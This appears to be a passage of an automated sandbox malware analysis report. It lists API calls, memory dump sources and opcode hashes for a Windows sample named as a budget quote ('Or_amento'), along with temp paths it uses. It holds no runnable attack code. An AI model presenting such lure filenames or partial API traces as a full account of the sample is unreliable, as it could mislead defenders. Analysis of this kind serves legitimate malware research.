                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0E676154108BFDB01DFA5EE47FE977ECAB44704F048035BA08D7091C674F5508768
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                                                                          • Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                          • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                                          • Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                                                                                                          • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00403266
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                                          • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405398
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                                                                                                                                                            • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054C3
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008), ref: 004054EC
                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405536
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0040557B
                                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405616
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405671
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                                                                                                                          • Opcode ID: c4b52b2e618ac1b4ceb8eccc4828d65ce2d69768586c872b5e4af6598ace69d9
                                                                                                                                                                                                                          • Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4b52b2e618ac1b4ceb8eccc4828d65ce2d69768586c872b5e4af6598ace69d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404716
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404722
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                                                                                                                                                                                            • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
                                                                                                                                                                                                                            • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76533420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                                                                                                            • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                                                                                                            • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,76533420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                                                                                                            • Part of subcall function 004062E4: CharPrevW.USER32(?,?,76533420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                                                                                                                                                                                            • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                                                                                                            • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                                                                                                                                                                                            • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$Call
                                                                                                                                                                                                                          • API String ID: 2624150263-211385702
                                                                                                                                                                                                                          • Opcode ID: 7c84fd604c64be66d5e66193ff5fa4d290b9f71cf9d700dc6b5080d1f641d0f0
                                                                                                                                                                                                                          • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c84fd604c64be66d5e66193ff5fa4d290b9f71cf9d700dc6b5080d1f641d0f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                                                                                                          • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty, xrefs: 00402154
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
